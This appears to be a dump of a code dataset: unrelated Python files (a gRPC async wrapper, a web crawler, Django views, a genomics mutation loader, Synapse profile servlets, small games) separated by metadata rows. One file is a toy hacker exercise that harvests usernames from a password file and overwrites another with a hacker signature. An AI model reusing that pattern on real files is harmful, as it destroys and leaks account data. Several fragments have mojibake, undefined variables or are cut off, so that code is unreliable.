print ('vocรช tem 10 dinheiros')
c=int(input('quantos chutes vocรช quer fazer ?'))
chutes =c
dinheiros = int(dinheiros-chutes)
jogo=True
while chutes>0:
d=int(input('Qual nรบmero vocรช acha que รฉ'))
chutes -=1
if d==soma2:
print('vocรช ganhou')
dinheiros= (dinheiros-chutes)+(dinheiros-chutes)*5
print ('Vocรช terminou o jogo com '+ dinheiros)
jogo=False
else:
print('vocรช perdeu')
if chutes==0:
print ('acabaram seus chutes')
print ('Vocรช terminou o jogo com '+ str(dinheiros)+ 'dinheiros')
jogo=False | [
"[email protected]"
] | |
ee41c189f6e2744c2bda1052b1c5c459b8f1b904 | d9b9169f26e2af20498551d78532550e2ed8996c | /script.py | 7880e4a3cd251e4ea6c1941c552abce067d80ff1 | [
"MIT"
] | permissive | SenayYakut/The-Fender | d64d11f17fc8f29aa06ad807668f4fe5e30767c8 | 73eef831f794da8f9476a61b46cf2122255d3300 | refs/heads/main | 2023-02-13T02:40:39.931220 | 2021-01-04T21:22:37 | 2021-01-04T21:22:37 | 326,808,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,292 | py | import csv
import json
compromised_users = []
with open("passwords.csv") as password_file:
password_csv = csv.DictReader(password_file)
for password_row in password_csv:
compromised_users.append(password_row["Username"])
with open("compromised_users.txt", "w") as compromised_user_file:
for compromised_user in compromised_users:
compromised_user_file.write(compromised_user)
with open("boss_message.json", "w") as boss_message:
boss_message_dict={"recipient":"The Boss", "message":"Mission Success"}
json.dump(boss_message_dict, boss_message)
with open("new_passwords.csv", "w") as new_passwords_obj:
slash_null_sig = """
_ _ ___ __ ____
/ )( \ / __) / \(_ _)
) \/ ( ( (_ \( O ) )(
\____/ \___/ \__/ (__)
_ _ __ ___ __ _ ____ ____
/ )( \ / _\ / __)( / )( __)( \
) __ (/ \( (__ ) ( ) _) ) D (
\_)(_/\_/\_/ \___)(__\_)(____)(____/
____ __ __ ____ _ _
___ / ___)( ) / _\ / ___)/ )( \
(___) \___ \/ (_/\/ \\___ \) __ (
(____/\____/\_/\_/(____/\_)(_/
__ _ _ _ __ __
( ( \/ )( \( ) ( )
/ /) \/ (/ (_/\/ (_/\
\_)__)\____/\____/\____/
"""
new_passwords_obj.write(slash_null_sig)
| [
"[email protected]"
] | |
8566fa992f8319c8dafcaf3b9d186e200769bc79 | bb2bd493a268e3ebfbb23167d5f38a1281bbf3b0 | /venv/lib/python3.7/site-packages/aiogrpc/utils.py | 36644ade5638b98ba20860e9c2374bdf0888b9bb | [] | no_license | EDD-Phoenix-Technologies/EDDMAVLink | ba33182c953628d620cf4dde1f81b430b2c3dcd8 | 55f3882b21c282324986f28315e4b37bbacee2ea | refs/heads/master | 2020-08-29T18:46:44.866677 | 2019-12-18T21:09:49 | 2019-12-18T21:09:49 | 218,134,620 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,467 | py | '''
Created on 2017/8/14
:author: hubo
'''
import asyncio
import functools
import queue
from asyncio.futures import CancelledError
def wrap_callback(callback, loop):
@functools.wraps(callback)
def _callback(*args, **kwargs):
if not loop.is_closed():
loop.call_soon_threadsafe(functools.partial(callback, *args, **kwargs))
return _callback
def wrap_active_test(func, test, loop, executor=None):
@functools.wraps(func)
async def _func(*args, **kwargs):
if test():
return await loop.run_in_executor(executor, functools.partial(func, *args, **kwargs))
else:
return func(*args, **kwargs)
return _func
def wrap_future(grpc_fut, loop):
fut_ = loop.create_future()
def _set_state(grpc_fut, fut_):
assert grpc_fut.done()
if fut_.cancelled():
return
assert not fut_.done()
if grpc_fut.cancelled():
fut_.cancel()
else:
exception = grpc_fut.exception()
if exception is not None:
fut_.set_exception(exception)
else:
result = grpc_fut.result()
fut_.set_result(result)
def _call_check_cancel(fut_):
if fut_.cancelled():
grpc_fut.cancel()
def _call_set_state(grpc_fut):
if not loop.is_closed():
loop.call_soon_threadsafe(_set_state, grpc_fut, fut_)
fut_.add_done_callback(_call_check_cancel)
grpc_fut.add_done_callback(_call_set_state)
return fut_
def copy_members(source, dest, member_list, wrapper=None):
for m in member_list:
f = getattr(source, m, None)
if f is None:
continue
if wrapper is not None:
f = wrapper(f)
setattr(dest, m, f)
def wrap_future_call(grpc_fut, loop, executor=None):
fut_ = wrap_future(grpc_fut, loop)
# Copy extra members
copy_members(grpc_fut, fut_,
['is_active',
'time_remaining'])
@functools.wraps(grpc_fut.add_callback)
def _add_callback(callback):
grpc_fut.add_callback(wrap_callback(callback, loop))
fut_.add_callback = _add_callback
copy_members(grpc_fut, fut_,
['initial_metadata',
'trailing_metadata',
'code',
'details'],
functools.partial(wrap_active_test, test=grpc_fut.is_active, loop=loop, executor=executor))
return fut_
class WrappedIterator(object):
"""
Wrap an grpc_iterator to an async iterator
"""
def __init__(self, grpc_iterator, loop, executor=None, stream_executor=None):
self._iterator = grpc_iterator
self._loop = loop
self._executor = executor
if stream_executor is None:
self._shared_executor = True
self._stream_executor = executor
else:
self._shared_executor = False
self._stream_executor = stream_executor
self._next_future = None
copy_members(grpc_iterator, self,
['is_active',
'time_remaining',
'cancel'])
@functools.wraps(grpc_iterator.add_callback)
def _add_callback(callback):
grpc_iterator.add_callback(wrap_callback(callback, loop))
self.add_callback = _add_callback
copy_members(grpc_iterator, self,
['initial_metadata',
'trailing_metadata',
'code',
'details'],
functools.partial(wrap_active_test, test=grpc_iterator.is_active, loop=loop, executor=executor))
def __aiter__(self):
return self
def _next(self):
if self._iterator is None:
raise StopAsyncIteration
try:
return next(self._iterator)
except StopIteration:
raise StopAsyncIteration
except Exception:
raise
async def __anext__(self):
if self._next_future is None:
if self._iterator is None:
raise StopAsyncIteration
self._next_future = self._loop.run_in_executor(self._stream_executor, self._next)
try:
return await asyncio.shield(self._next_future, loop=self._loop)
finally:
if self._next_future and self._next_future.done():
self._next_future = None
def __del__(self):
if self._iterator is not None:
self.cancel()
self._iterator = None
if self._next_future is not None:
if not self._loop.is_closed():
self._loop.call_soon_threadsafe(lambda f=self._next_future: f.cancel())
self._next_future = None
if not self._shared_executor and self._stream_executor is not None:
self._stream_executor.shutdown()
self._stream_executor = None
async def aclose(self):
self.__del__()
class IteratorScope(object):
def __init__(self, _iter):
self._iter = _iter
async def __aenter__(self):
return self._iter
async def __aexit__(self, exc_val, exc_typ, exc_tb):
await self._iter.aclose()
class WrappedAsyncIterator(object):
"""
Wrap an async iterator to an iterator for grpc input
"""
def __init__(self, async_iter, loop):
self._async_iter = async_iter
self._loop = loop
self._q = queue.Queue()
self._stop_future = loop.create_future()
self._next_future = None
self._closed = False
def __iter__(self):
return self
async def _next(self):
if self._async_iter is None:
# An edge condition
self._q.put((None, True))
return
if self._next_future is None:
self._next_future = asyncio.ensure_future(self._async_iter.__anext__(), loop=self._loop)
try:
done, _ = await asyncio.wait([self._stop_future, self._next_future], loop=self._loop,
return_when=asyncio.FIRST_COMPLETED)
if self._stop_future in done:
self._q.put((await self._stop_future, True))
self._next_future.cancel()
try:
await self._next_future
except CancelledError:
pass
finally:
self._next_future = None
else:
nf = self._next_future
self._next_future = None
self._q.put((await nf, False))
except StopAsyncIteration:
self._q.put((None, True))
except Exception as exc:
self._q.put((exc, True))
def __next__(self):
if self._async_iter is None:
raise StopIteration
try:
r, is_exc = self._q.get_nowait()
except queue.Empty:
if not self._loop.is_closed():
self._loop.call_soon_threadsafe(functools.partial(asyncio.ensure_future, self._next(), loop=self._loop))
r, is_exc = self._q.get()
if is_exc:
if r is None:
self._async_iter = None
raise StopIteration
else:
raise r
else:
return r
def close(self):
if self._async_iter is not None:
async def async_close():
if not self._stop_future.done():
self._stop_future.set_result(None)
await self._async_iter.aclose()
try:
if not self._loop.is_closed():
self._loop.call_soon_threadsafe(functools.partial(asyncio.ensure_future, async_close(), loop=self._loop))
finally:
# Ensure __next__ ends
self._q.put((None, True))
self._async_iter = None
def cancel(self, exception=True):
if exception:
exc = CancelledError()
else:
exc = None
def _set_result():
if not self._stop_future.done():
self._stop_future.set_result(exc)
# Ensure __next__ ends. Sometimes the loop is already closing, so the exit result may not be written
# to the queue
self._q.put((exc, True))
if not self._loop.is_closed():
self._loop.call_soon_threadsafe(_set_result)
| [
"[email protected]"
] | |
f9d41f245e77585a9706f05b7d71b832f102caea | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/binarySearchTree_20200615162637.py | a9977b630993eb4c07314b2e1ce2897670babb9a | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23 | py | def search(list):
| [
"[email protected]"
] | |
438b13034d8746638556d5557ff9f5143b7c96a6 | 32d67615b646b5917618abcb2efc93fea222fb76 | /day01_vscode/gui/numberGameGuiVersion.py | 48a6d4bd91e575fe45ac7aa9a80fd01a2b3effb5 | [] | no_license | jihazard/python | 449ef551a42e4874d1b9d82f27ba759122ae11a3 | 0991d7e1299aea6a77edb59a765bc13ced915864 | refs/heads/master | 2020-05-24T13:44:10.475777 | 2019-06-08T09:05:23 | 2019-06-08T09:05:23 | 187,295,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | import easygui
import random
num = 0
times = 6
answer = random.randint(1,100)
while num != answer and times > 0 :
num = easygui.integerbox("1~100 ์ฌ์ด ์ซ์๋ฅผ ์
๋ ฅํ์ธ์ . ๋์ ๊ธฐํ = " + str(times))
if num < answer :
easygui.msgbox(str(num) + " ์ ์ ๋ต๋ณด๋ค ํฝ์ต๋๋ค.")
else :
easygui.msgbox(str(num) + " ์ ์ ๋ต๋ณด๋ค ์์ต๋๋ค.")
times -= 1
if num == answer :
easygui.msgbox(" ์ ๋ต์
๋๋ค. ์ ๋ต์ {} ์
๋๋ค. ".format(answer))
else :
easygui.msgbox(" ์ค๊ฒฉ์
๋๋ค. ์ ๋ต์ {} ์
๋๋ค.".format(answer)) | [
"[email protected]"
] | |
7624925bba586dba65beb5197b61c0b90b99d6c7 | 8e6c2a485a86cbb5978f2976295223f1e04f8385 | /src/search/views.py | 45b79959e1891c6a5620bdbf49e368791fa69a98 | [] | no_license | sergiopassos/ecommerce_django | a97d6061a555b86205a713fd3ccb220633925be3 | 2c1a9e028f06fedf77723dc6efd518ed7163f912 | refs/heads/master | 2020-05-03T12:27:36.406835 | 2019-06-01T00:23:29 | 2019-06-01T00:23:29 | 178,626,811 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | py | from django.shortcuts import render
from django.views.generic import ListView
from products.models import Product
class SearchProductView(ListView):
template_name = "search/view.html"
def get_context_data(self, *args, **kwargs):
context = super(SearchProductView, self).get_context_data(*args, **kwargs)
query = self.request.GET.get('q')
context['query'] = query
return context
def get_queryset(self, *args, **kwargs):
request = self.request
# print(request.GET)
method_dict = request.GET
query = method_dict.get('q', None)
print(query)
if query is not None:
return Product.objects.search(query)
return Product.objects.featured()
| [
"[email protected]"
] | |
9eed5071f02d5d89a6660a17d90a867d9199273d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/21/usersdata/134/8920/submittedfiles/exercicio24.py | 71f81edc38a08d14b4e3846712511d689d38c81c | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
a = input('Digite o valor de a:')
b = input('Digite o valor de b:')
if a>b:
i=a
elif b>a:
i=b
while i>0:
if a%i==0 and b%i==0:
print ('%i')
break
i= i - 1
| [
"[email protected]"
] | |
4e75c82e10fbb1fea6eade40fef334197dc7c816 | ccc6350955af98c02207e070d2a8c3f861d8c8f6 | /src/Spider.py | 6417e9eaf147ba2ec24a6ec22607ebcd20194a5d | [
"MIT"
] | permissive | harry363/Crawler | 0fc8ba40e4605ee301dc8b2b494fc990f74fabe1 | 90f42cf5fe3a8df52d2e0106fbae3dbc70b316f8 | refs/heads/master | 2020-08-27T11:56:34.639229 | 2019-10-24T13:30:22 | 2019-10-24T13:30:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,322 | py | from urllib.request import urlopen
from link_finder import LinkFinder
from general import *
class Spider:
# class variables (shared among all instances)
project_name = ''
base_url = ''
domain_name = ''
queue_file = ''
crawled_file = ''
queue = set()
crawled = set()
def __init__(self, project_name, base_url, domain_name):
Spider.project_name = project_name
Spider.base_url = base_url
Spider.domain_name = domain_name
Spider.queue_file = project_name + '/queue.txt'
Spider.crawled_file = project_name + '/crawled.txt'
self.boot()
self.crawl_page('FirstSpider', Spider.base_url)
@staticmethod
def boot():
create_project_dir(Spider.project_name)
create_data_files(Spider.project_name, Spider.base_url)
Spider.queue = file_to_set(Spider.queue_file)
Spider.crawled = file_to_set(Spider.crawled_file)
@staticmethod
def crawl_page(thread_name, page_url):
if page_url not in Spider.crawled:
print(thread_name + ' now crawling ' + page_url)
print('Queue ' + str(len(Spider.queue)) + ' | Crawled ' + str(len(Spider.crawled)))
Spider.add_links_to_queue(Spider.gather_links(page_url))
Spider.queue.remove(page_url)
Spider.crawled.add(page_url)
Spider.update_files()
@staticmethod
def gather_links(page_url):
html_string = ''
try:
response = urlopen(page_url)
if response.getheader('Content-Type') == 'text/html':
html_bytes = response.read()
html_string = html_bytes.decode("utf-8")
finder = LinkFinder(Spider.base_url, page_url)
finder.feed(html_string)
except:
return set()
return finder.page_links()
@staticmethod
def add_links_to_queue(links):
for url in links:
if url in Spider.queue:
continue
if url in Spider.crawled:
continue
if Spider.domain_name not in url:
continue
Spider.queue.add(url)
@staticmethod
def update_files():
set_to_file(Spider.queue, Spider.queue_file)
set_to_file(Spider.crawled, Spider.crawled_file) | [
"[email protected]"
] | |
de3288081330c0008e1d1259e27e28d6408fa959 | 34570e32855109a3e0dd41ac760098bd230dc65e | /mmmvi/lib/load_data.py | 135da604afa46a0b46c1c394d93493973af8455a | [
"MIT"
] | permissive | melohar/voc-identify | 55520cb291d1faa8ffb19f98970609b9dd01f0de | f98ec3b2f1c6ce687953cca9cb9ccdaea20ac3a5 | refs/heads/main | 2023-08-04T15:48:27.205038 | 2021-09-09T17:08:19 | 2021-09-09T17:08:19 | 404,818,227 | 1 | 0 | MIT | 2021-09-09T17:49:54 | 2021-09-09T17:49:54 | null | UTF-8 | Python | false | false | 9,009 | py | import itertools
import logging
import re
import string
import yaml
from pathlib import Path
from typing import List, Tuple
import pandas as pd
import pysam
from mmmvi.lib.types import VoCs, Reads, Mutations
def load_mutations(
mutations_path: Path,
reference_path: Path,
voc_col: str,
mut_col: str,
delimiter: str,
selected_vocs: List[str],
) -> VoCs:
# Decides whether to load variant definitions from a tabular file or from a directory
# containing Public Health England-formatted YAML files.
#
# If the path provided by the --mutations command line argument is a file,
# load_tabular_mutations is attempted. If the path instead refers to a directory,
# load_mutations_phe is attempted.
if mutations_path.is_file():
vocs = load_tabular_mutations(
mutations_path, reference_path, voc_col, mut_col, delimiter, selected_vocs
)
elif mutations_path.is_dir() and list(mutations_path.glob("*.yml")):
vocs = load_mutations_phe(mutations_path, reference_path, selected_vocs)
else:
msg = f"Error: {mutations_path} does not appear to be a readable file or a directory containing .yml files"
raise FileNotFoundError(msg)
return vocs
def load_reference(reference: Path) -> str:
# Loads the FASTA-formatted reference genome
#
# The reference genome *must* be a single complete sequence
# in FASTA format
lines = []
with reference.open("r") as f:
for line in f:
if not line.startswith(">"):
lines.append(line.strip())
seq = "".join(lines)
return seq
def parse_mutation(s: str):
# Parses the mutation string from the mutations file
#
# The mutation string can be in one of 4 formats:
# A123T # point substitution
# CAT123GTA # multiple base substitution
# [123-125]del # deletion
# 123CAT # insertion
if s.endswith("del"):
position_range, wt, mutation = parse_deletion(s)
elif s[0] in string.ascii_uppercase:
position_range, wt, mutation = parse_substitution(s)
else:
position_range, wt, mutation = parse_insertion(s)
return position_range, wt, mutation
def parse_deletion(s: str):
# [123-125]del means that reference positions 123, 124, and 125 are deleted in the read
_, *start_stop, _ = re.split(r"[\[\-\]]", s)
try:
start, stop = start_stop
except ValueError:
start = stop = start_stop[0]
if stop < start:
raise ValueError(f"stop is less than start in {s}")
start = int(start)
stop = int(stop)
position_range = tuple(range(start - 1, stop))
mutation = tuple(None for _ in position_range)
wt = (None,)
return position_range, wt, mutation
def parse_substitution(s: str):
# A123T means A in the reference has been substituted by T in read
# CAT123GTA means C, A, T at positions 123, 124, 125 have been substituted by G, T, A
wt, mutation = (tuple(x) for x in re.findall(r"[ATCG]+", s))
if len(wt) != len(mutation):
wt_str = "".join(wt)
mut_str = "".join(mutation)
raise ValueError(
f"Mismatch between length of wild type '{wt_str}' and mutant '{mut_str}' in '{s}'"
)
start = int(re.search(r"\d+", s).group()) - 1
position_range = tuple(range(start, start + len(wt)))
return position_range, wt, mutation
def parse_insertion(s: str):
# 123CAT indicates CAT has been inserted betwixt reference positions 123 and 124
position = int("".join(itertools.takewhile(lambda x: x in string.digits, s)))
# Exactly 1 None will get the whole insertion by exploiting pd.Series indexing
position_range = (position - 1, None, position)
mutation = tuple("".join(itertools.dropwhile(lambda x: x in string.digits, s)))
wt = tuple(None for _ in mutation)
return position_range, wt, mutation
def load_tabular_mutations(
mutations_path: Path,
reference_path: Path,
voc_col: str,
mut_col: str,
delimiter: str,
selected_vocs: List[str],
) -> VoCs:
# Loads the mutations file
#
# The mutations file is a tabular delimited file, which must
# contain at least the following two columns, with other
# columns ignored:
# 1) a column containing the names of each variant (voc_col)
# 2) a column containing the mutation strings (mut_col)
data = pd.read_csv(mutations_path, sep=delimiter)
reference_seq = load_reference(reference_path)
vocs = {"reference": {}}
for idx, row in data.iterrows():
voc = row[voc_col]
if selected_vocs and voc not in selected_vocs:
continue
mutation_string = row[mut_col].strip()
try:
position_range, wt, mutant = parse_mutation(mutation_string)
# catch *all* exceptions from parsing,
# because any problems here should stop the program
except Exception:
msg = f"Invalid mutation string: '{mutation_string}'"
raise InvalidMutation(msg)
if voc not in vocs:
vocs[voc] = {}
try:
vocs[voc][position_range].add(mutant)
except KeyError:
vocs[voc][position_range] = {mutant}
if wt == (None,):
wt = tuple(reference_seq[position] for position in position_range)
vocs["reference"][position_range] = [wt]
return vocs
def load_mutations_phe(
mutations_dir: Path, reference_path: Path, selected_vocs: List[str]
) -> VoCs:
# Manages loading variant definitions from a directory full of YAML files
# using the schema described by https://github.com/phe-genomics/variant_definitions/
vocs = {"reference": {}}
# the spec explicitly states the extension will be .yml, and so we can rely on it
variant_files = mutations_dir.glob("*.yml")
for variant in variant_files:
voc = variant.stem # per the spec, the file name matches its 'unique-id' value
reference, mutations = load_variant_from_phe_yaml(variant, reference_path)
if selected_vocs and voc not in selected_vocs:
continue
vocs["reference"].update(reference)
vocs[voc] = mutations
return vocs
def load_variant_from_phe_yaml(
yaml_variant: Path, reference_path: Path
) -> Tuple[Mutations, Mutations]:
# Loads VOC signature mutations from a YAML file using
# Public Health England's format for SARS-CoV-2 variants:
# https://github.com/phe-genomics/variant_definitions/
reference = {}
voc = {}
data = yaml.safe_load(yaml_variant.read_text())
reference_seq = load_reference(reference_path)
for mutation in data["variants"]:
start = mutation["one-based-reference-position"] - 1
if mutation["type"] == "SNP":
wt = (mutation["reference-base"],)
mutant = (mutation["variant-base"],)
position_range = (start,)
elif mutation["type"] == "MNP":
wt = tuple(mutation["reference-base"])
mutant = tuple(mutation["variant-base"])
position_range = tuple(range(start, start + len(wt)))
elif mutation["type"] == "insertion":
mutant = tuple(mutation["variant-base"][1:])
wt = tuple(None for _ in mutant)
position_range = (start, None, start + 1)
elif mutation["type"] == "deletion":
position_range = tuple(
range(start, start + len(mutation["reference-base"]) - 1)
)
wt = (None,)
mutant = tuple(None for _ in position_range)
else:
msg = "Mutation type '{}' is not implemented".format(mutation["type"])
raise NotImplementedError(msg)
if wt == (None,):
wt = tuple(reference_seq[position] for position in position_range)
try:
voc[position_range].add(mutant)
except KeyError:
voc[position_range] = {mutant}
reference[position_range] = [wt]
return reference, voc
def load_reads(reads_path: Path, ref_path: Path) -> Reads:
# Loads reads from a BAM file on disk and returns the unique reads.
#
# The the sequence is used as the key. The dictionary keeps track of the
# set of read names which share that sequence, as well as a representative
# pysam.AlignedSegment object
logging.info(f"Loading reads from {reads_path}")
reads = {}
with pysam.AlignmentFile(reads_path, reference_filename=str(ref_path)) as readsfile:
for read in readsfile:
seq = read.query_sequence
orientation_tag = "rev" if read.is_reverse else "fwd"
read_name = f"{read.query_name}:{orientation_tag}"
try:
reads[seq]["reads"].add(read_name)
except KeyError:
reads[seq] = {"reads": {read_name}, "read_obj": read}
return reads
class InvalidMutation(Exception):
pass
| [
"[email protected]"
] | |
bb19b100daf84b032c032f56af6dcd1dd83acbe3 | 3fce3e0706e7ccac209aaa924365f14eaf90d632 | /trs_pdf-txt.py | af0409e933e8ead5c5af2aaeb99271c97e26fed5 | [] | no_license | lwx-hnu/elervise | ccb545cc905d7c4523e5f9352afe8ec3fa8bf40b | aeed17158ec62fdee881181a90e5e2928a7b8d53 | refs/heads/main | 2023-01-31T15:21:43.461001 | 2020-12-18T09:35:31 | 2020-12-18T09:35:31 | 321,296,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,304 | py | #!/usr/bin/env python
# encoding: utf-8
"""
@author: wugang
@software: PyCharm
@file: prase_pdf.py
@time: 2017/3/3 0003 11:16
"""
import sys
import importlib
import os
import time
importlib.reload(sys)
from pdfminer.pdfparser import PDFParser,PDFDocument
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal,LAParams
from pdfminer.pdfinterp import PDFTextExtractionNotAllowed
from PyPDF2 import PdfFileReader, PdfFileWriter
path = r'C:\Users\ASUS\Desktop\1\Cheat_Sheets.pdf'
def parse():
fp = open(path, 'rb') # ไปฅไบ่ฟๅถ่ฏปๆจกๅผๆๅผ
#็จๆไปถๅฏน่ฑกๆฅๅๅปบไธไธชpdfๆๆกฃๅๆๅจ
praser = PDFParser(fp)
# ๅๅปบไธไธชPDFๆๆกฃ
doc = PDFDocument()
# ่ฟๆฅๅๆๅจ ไธๆๆกฃๅฏน่ฑก
praser.set_document(doc)
doc.set_parser(praser)
# ๆไพๅๅงๅๅฏ็
# ๅฆๆๆฒกๆๅฏ็ ๅฐฑๅๅปบไธไธช็ฉบ็ๅญ็ฌฆไธฒ
doc.initialize()
# ๆฃๆตๆๆกฃๆฏๅฆๆไพtxt่ฝฌๆข๏ผไธๆไพๅฐฑๅฟฝ็ฅ
if not doc.is_extractable:
raise PDFTextExtractionNotAllowed
else:
# ๅๅปบPDf ่ตๆบ็ฎก็ๅจ ๆฅ็ฎก็ๅ
ฑไบซ่ตๆบ
rsrcmgr = PDFResourceManager()
# ๅๅปบไธไธชPDF่ฎพๅคๅฏน่ฑก
laparams = LAParams()
device = PDFPageAggregator(rsrcmgr, laparams=laparams)
# ๅๅปบไธไธชPDF่งฃ้ๅจๅฏน่ฑก
interpreter = PDFPageInterpreter(rsrcmgr, device)
# ๅพช็ฏ้ๅๅ่กจ๏ผๆฏๆฌกๅค็ไธไธชpage็ๅ
ๅฎน
for page in doc.get_pages(): # doc.get_pages() ่ทๅpageๅ่กจ
interpreter.process_page(page)
# ๆฅๅ่ฏฅ้กต้ข็LTPageๅฏน่ฑก
layout = device.get_result()
# ่ฟ้layoutๆฏไธไธชLTPageๅฏน่ฑก ้้ขๅญๆพ็ ่ฟไธชpage่งฃๆๅบ็ๅ็งๅฏน่ฑก ไธ่ฌๅ
ๆฌLTTextBox, LTFigure, LTImage, LTTextBoxHorizontal ็ญ็ญ ๆณ่ฆ่ทๅๆๆฌๅฐฑ่ทๅพๅฏน่ฑก็textๅฑๆง๏ผ
for x in layout:
if (isinstance(x, LTTextBoxHorizontal)):
with open(r'C:\Users\ASUS\Desktop\log\1.txt', 'a',encoding='utf-8') as f:
results = x.get_text()
print(results)
f.write(results + '\n')
if __name__ == '__main__':
parse()
| [
"[email protected]"
] | |
a3cf65f973774762a7b991821f94923a6700c945 | 543ded96b4a146371453680d032aada2a6788430 | /home/views.py | 09f0ef663ba7fe2552d4172b2673c248f36ef172 | [] | no_license | mat0ccdeekk/cooabit_temp | 638c1ad739d1510ac90524273651fd8c8d7dd5ac | 18ff42eeb86c593686e120e724512840df555403 | refs/heads/master | 2023-01-01T15:46:50.787501 | 2020-10-26T22:11:51 | 2020-10-26T22:11:51 | 297,378,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,539 | py | from django.shortcuts import render, get_object_or_404, HttpResponseRedirect, HttpResponse, redirect
from django.views.generic.edit import CreateView
from .forms import CasaForm
from .mixins import StaffMixing
from .models import Casa
import time
import os
def CreaCasa(request, pk):
print("siamo ancora qua")
if request.method == "POST":
form_casa = CasaForm(request.POST, request.FILES)
print(form_casa)
if form_casa.is_valid():
folder = ""
tempo = ""
# folder += tempo
# print("tempo ",tempo)
# print("nome cartella", folder)
# folder = request.user.first_name+"_"+request.user.last_name
# tempo = time.ctime()
# settings.MEDIA_ROOT=os.path.join(os.path.dirname(BASE_DIR), 'media-serve/'+folder)
form_casa.save()
return HttpResponseRedirect("/")
else:
print("form_casa not valid")
print("view")
form_casa = CasaForm()
context = {"casa": form_casa}
return render(request, "home/crea_casa.html", context)
"""
def CreaCasa(request, pk):
print("siamo ancora qua")
if request.method == "POST":
print("vediamoooo",request.FILES)
form_gallery = GalleryForm(request.POST, request.FILES)
form_casa = CasaForm(request.POST)
print(form_gallery)
print(form_casa)
if form_casa.is_valid():
if form_gallery.is_valid():
newGallery = form_gallery.save(commit=False)
form_casa.gallery = newGallery
form_casa.save()
return HttpResponseRedirect("/")
else:
print("form_gallery not valid")
else:
print("form_casa not valid")
print("view")
form_gallery = GalleryForm()
form_casa = CasaForm()
context = {"casa": form_casa, "form_gallery": form_gallery}
return render(request, "home/crea_casa.html", context)
"""
def visualizzaCasa(request, pk):
casa = get_object_or_404(Casa, pk=pk)
if casa.prezzo > 0 and casa.postiTotali > 0:
prezzoStudente = casa.prezzo / casa.postiTotali
via = ""
if casa.zona != "none":
via = via + casa.zona
if casa.via != "none":
via = casa.via
context = {"casa": casa, "prezzoStudente": prezzoStudente, "via": via}
return render(request, "detail-rooms.html", context)
def creaThunder(request, pk):
casa = get_object_or_404(Casa, pk=pk)
#ciao talebano come stai??
## TODO: sto bene
| [
"[email protected]"
] | |
94b54af84eb8299af883d3194845985ab5a23e94 | 804e6c5df909db32b31679c11b0044c4cb9a1590 | /synapse/rest/client/v1/profile.py | 5fc365e04783b6b3277398d14828b2d56da9c665 | [] | no_license | Jd8111997/ChatClub | f50d6ec417ee68b3e4b5b3fc4cf42a74c94c9fc0 | 9e226325ea12e8c0c5a2f1db264642763e56b1c4 | refs/heads/master | 2020-07-30T11:15:08.677684 | 2019-09-22T14:56:22 | 2019-09-22T14:56:22 | 210,209,834 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,634 | py | # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" This module contains REST servlets to do with profile: /profile/<paths> """
from twisted.internet import defer
from synapse.http.servlet import parse_json_object_from_request
from synapse.types import UserID
from synapse.types import RoomID
from .base import ClientV1RestServlet, client_path_patterns
class ProfileDisplaynameRestServlet(ClientV1RestServlet):
PATTERNS = client_path_patterns("/profile/(?P<user_id>[^/]*)/displayname")
def __init__(self, hs):
super(ProfileDisplaynameRestServlet, self).__init__(hs)
self.profile_handler = hs.get_profile_handler()
@defer.inlineCallbacks
def on_GET(self, request, user_id):
user = UserID.from_string(user_id)
displayname = yield self.profile_handler.get_displayname(
user,
)
ret = {}
if displayname is not None:
ret["displayname"] = displayname
defer.returnValue((200, ret))
@defer.inlineCallbacks
def on_PUT(self, request, user_id):
requester = yield self.auth.get_user_by_req(request, allow_guest=True)
user = UserID.from_string(user_id)
is_admin = yield self.auth.is_server_admin(requester.user)
content = parse_json_object_from_request(request)
try:
new_name = content["displayname"]
except Exception:
defer.returnValue((400, "Unable to parse name"))
yield self.profile_handler.set_displayname(
user, requester, new_name, is_admin)
defer.returnValue((200, {}))
def on_OPTIONS(self, request, user_id):
return (200, {})
#--------------------for dob save-------------------------------------------------
class ProfileDobRestServlet(ClientV1RestServlet):
PATTERNS = client_path_patterns("/profile/(?P<user_id>[^/]*)/dob")
def __init__(self, hs):
super(ProfileDobRestServlet, self).__init__(hs)
self.profile_handler = hs.get_profile_handler()
@defer.inlineCallbacks
def on_GET(self, request, user_id):
user = UserID.from_string(user_id)
dob = yield self.profile_handler.get_dob(
user,
)
print "---------------------In V1/profile.py -- ProfileDobRestServlet class-----------------------------------"
print "dob = ",dob
print "-------------------------------------------------------------------------------------------------------"
ret = {}
if dob is not None:
ret["dob"] = dob
defer.returnValue((200, ret))
@defer.inlineCallbacks
def on_PUT(self, request, user_id):
requester = yield self.auth.get_user_by_req(request, allow_guest=True)
user = UserID.from_string(user_id)
is_admin = yield self.auth.is_server_admin(requester.user)
